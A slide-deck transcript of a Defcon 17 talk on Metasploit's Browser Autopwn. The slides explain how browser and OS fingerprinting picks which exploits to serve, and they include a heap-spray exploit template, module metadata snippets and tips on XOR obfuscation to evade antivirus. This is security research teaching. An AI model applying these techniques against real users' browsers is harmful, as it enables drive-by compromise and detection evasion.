using guided missiles in drive-bys: automatic browser fingerprinting and exploitation with the...
DESCRIPTION
Presented at Defcon 17TRANSCRIPT
![Page 1: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/1.jpg)
Using Guided Missiles in Drivebys
Automatic browser fingerprinting and exploitation with the Metasploit Framework:
Browser Autopwn
James Lee
![Page 2: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/2.jpg)
2
Browser Autopwn
● Auxiliary module for the Metasploit Framework● Fingerprints a client● Determines what exploits might work● Used to suck● Now it doesn't
![Page 3: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/3.jpg)
3
Outline
● Intro● Cluster bombs● Guided missiles
● Fingerprinting and targeting
● Stealth● Demos● Commercial comparison
![Page 4: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/4.jpg)
4
# whoami
● James Lee● egypt ● CoFounder, Teardrop Security● Developer, Metasploit Project
![Page 5: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/5.jpg)
5
My Involvement in MSF
● Started submitting patches and bug reports in 2007
● HD gave me commit access in April 2008● Broke the repo April 2008
![Page 6: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/6.jpg)
6
The Metasploit Framework
● Created by HD Moore in 2003● ncurses based game● Later became a real exploit framework in perl
● Rewritten in ruby in 2005● Which is way better than python
● Extensible framework for writing exploits
![Page 7: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/7.jpg)
7
I <3 MSF
● Modular payloads and encoders● Many protocols already implemented● Many nonexploit tools● All kinds of exploits
● Traditional serverside● Clientsides
![Page 8: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/8.jpg)
8
Why Clientsides
● Karmetasploit ● Any other tool that gets you in the middle● Users are weakest link, blah, blah, blah● See Chris Gates
![Page 9: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/9.jpg)
9
Client Exploits in MSF
● Extensive HTTP support● Heapspray in two lines of code● Sotirov's .NET DLL, heap feng shui
● Wide range of protocollevel IDS evasion● Simple exploit in ~10 lines of code
![Page 10: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/10.jpg)
10
Simple Exploit
content = “<html><body><object id='obj' classid='...'></object><script>#{js_heap_spray}sprayHeap(#{payload.encoded}, #{target.ret}, 0x4000);obj.VulnMethod(#{[target.ret].pack(“V”)*1000});</script></body></html>“
send_response(client, content)
![Page 11: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/11.jpg)
11
Or Arbitrarily Complex
● ani_loadimage_chunksize is 581 lines of code● As of June 28, MSF has 85 browser exploit
modules
![Page 12: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/12.jpg)
Problem
![Page 13: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/13.jpg)
Solution
![Page 14: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/14.jpg)
14
Cluster Bomb Approach
● Is it IE? Send all the IE sploits● Is it FF? Send all the FF sploits● Originally exploits were adhoc
● Pain in the ass when new sploits come out
![Page 15: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/15.jpg)
Problem
![Page 16: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/16.jpg)
Solution
![Page 17: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/17.jpg)
17
Guided Missile Approach
● Better client and OS fingerprinting● less likely to crash or hang the browser
● Only send exploits likely to succeed● Browser is IE7? Don't send IE6 sploits, etc.
![Page 18: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/18.jpg)
18
Fingerprinting the Client
● User Agent● Easy to spoof● Easy to change in a
proxy● A tiny bit harder to
change in JS
![Page 19: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/19.jpg)
19
Fingerprinting the Client
● Various JS objects only exist in one browser● window.opera, Array.every
● Some only exist in certain versions● window.createPopup, Array.every, window.Iterator
● Rendering differences and parser bugs● IE's conditional comments
![Page 20: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/20.jpg)
20
Internet Explorer
● Parser bugs, conditional comments● Reliable, but not precise
● ScriptEngine*Version()● Almost unique across all combinations of client and
OS● Brought to my attention by Jerome Athias
![Page 21: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/21.jpg)
21
Opera
● window.opera.version()● Includes minor version, e.g. “9.61”
![Page 22: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/22.jpg)
22
Hybrid Approach for FF
● Existence of document.getElementsByClassNamemeans Firefox 3.0
● If User Agent says IE6, go with FF 3.0● If UA says FF 3.0.8, it's probably not lying, so
use the more specific value
![Page 23: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/23.jpg)
23
Safari
● Still in progress● Existence of window.console
● If Firebug is installed on FF, shows up there, too
● Availability of window.onmousewheel● Defaults to null, so have to check typeof
![Page 24: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/24.jpg)
24
Fingerprinting the OS
● User Agent● Could use something like p0f● From the server side, that's about it
![Page 25: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/25.jpg)
25
Internet Explorer
● Again, ScriptEngine*Version()● Almost unique across all combinations of client
and OS, including service pack
![Page 26: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/26.jpg)
26
Opera
● Each build has a unique opera.buildNumber()● Gives platform, but nothing else
![Page 27: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/27.jpg)
27
Firefox
● navigator.platform and friends are affected by the User Agent string
● navigator.oscpu isn't● “Linux i686”● “Windows NT 6.0”
![Page 28: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/28.jpg)
28
Others
● Really all we're left with is the User Agent● That's okay, most don't lie
● And those that do are likely to be patched anyway
● Generic, works everywhere when UA is not spoofed
![Page 29: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/29.jpg)
29
Future Fingerprinting
● QuickTime● Adobe● Less wellknown third party stuff
![Page 30: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/30.jpg)
30
ActiveX
● “new ActiveXObject()” works if you have the class name
● Otherwise, IE doesn't seem to have a generic way to tell if an ActiveX object got created ● document.write(“<object ...>”)● document.createElement(“object”)
![Page 31: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/31.jpg)
31
Solution
● typeof(obj.method)● 'undefined' if the object failed to initialize● 'unknown' or possibly a real type if it worked
![Page 32: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/32.jpg)
Target Acquired
![Page 33: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/33.jpg)
33
What is it Vulnerable to?
● Coarse determination serverside● JavaScript builds fingerprint, sends it back to the
server● Server sends sploits that match the browser and
OS, possibly version
● Fine determination clientside● navigator.javaEnabled exists, try mozilla_navigatorjava
![Page 34: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/34.jpg)
Select a Missile
● Sort by reliability● Exploits contain
their own JS tests
![Page 35: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/35.jpg)
Problem
![Page 36: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/36.jpg)
36
Solution
![Page 37: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/37.jpg)
37
Obfuscation
● Randomize identifiers● Build strings from other things● JSON / AJAX● Obfuscation is not crypto
![Page 38: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/38.jpg)
38
Encryption
● Put a key in the URL● Not available in the standalone script
● Simple XOR is enough to beat AV and NIDS● If they figure it out, it's easy to make the crypto
stronger
![Page 39: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/39.jpg)
39
Demonstrations
![Page 40: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/40.jpg)
40
And we're back...
● I hope that worked● Now how do YOU make exploits work within
this framework?
![Page 41: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/41.jpg)
41
Writing Exploits
● Add autopwn_info() to top of exploit class● :ua_name is an array of browsers this exploit
will work against● :vuln_test is some javascript to test for the
vulnerability (unless it's ActiveX)● Usually comes directly from the exploit anyway
![Page 42: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/42.jpg)
42
Example: mozilla_navigatorjava
include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :javascript => true, :rank => NormalRanking,#reliable memory corruption :vuln_test => %Q| if (
window.navigator.javaEnabled && window.navigator.javaEnabled()
){ is_vuln = true; } |, })
![Page 43: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/43.jpg)
43
Example: ms06_067_keyframe
include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => 'KeyFrame', :classid => 'DirectAnimation.PathControl', :rank => NormalRanking #reliable memory corruption })
![Page 44: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/44.jpg)
44
Example: winzip_fileview
include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => 'CreateFolderFromName', :classid => '{A09AE68FB14D43EDB713BA413F034904}', :rank => NormalRanking #reliable memory corruption })
![Page 45: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/45.jpg)
45
Browser Autopwn Summary
● Reliable Target Acquisition● Smart Missile Selection● Stealthy from an AV perspective● Easy to extend● Detection results stored in a database
![Page 46: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/46.jpg)
46
Commercial Comparison
● Mpack● Firepack● Neosploit● Luckysploit
![Page 47: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/47.jpg)
47
Mpack, Firepack
● Hard to acquire● Old exploits● Detection is only serverside● Hard to change or update exploits● Obfuscation + XOR
![Page 48: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/48.jpg)
48
Neosploit
● Compiled ELFs run as CGI● Unless you get the source or do some RE, you
won't really know what it does
![Page 49: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/49.jpg)
49
Luckysploit
● Real crypto (RSA, RC4)● Even harder to acquire
![Page 50: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/50.jpg)
50
Browser Autopwn
● Easy to write new exploits or take out old ones● Free (threeclause BSD license)● Easy to get (http://metasploit.com)● Not written in PHP ● OS and client detection is clientside, more
reliable in presence of spoofed or borked UA
![Page 51: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/51.jpg)
51
Future
● More flexible payload selection● Stop when you get a shell
● Maybe impossible in presence of NAT/proxies
● Easiertouse JS obfuscation● UAProf for mobile devices● Integration with MetaPhish
![Page 52: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/52.jpg)
52
Download it
● svn co http://metasploit.com/svn/framework3/trunk
● Submit patches to [email protected]
![Page 53: Using Guided Missiles in Drive-bys: Automatic Browser Fingerprinting and Exploitation with the Metasploit Framework's Browser Autopwn](https://reader034.vdocuments.pub/reader034/viewer/2022052311/55837c25d8b42ac1268b4f55/html5/thumbnails/53.jpg)
Thanks
● hdm, valsmith, tebo, mc, cg, Dean de Beer, pragmatk
● Everybody who helped with testing
● Whoever created ActiveX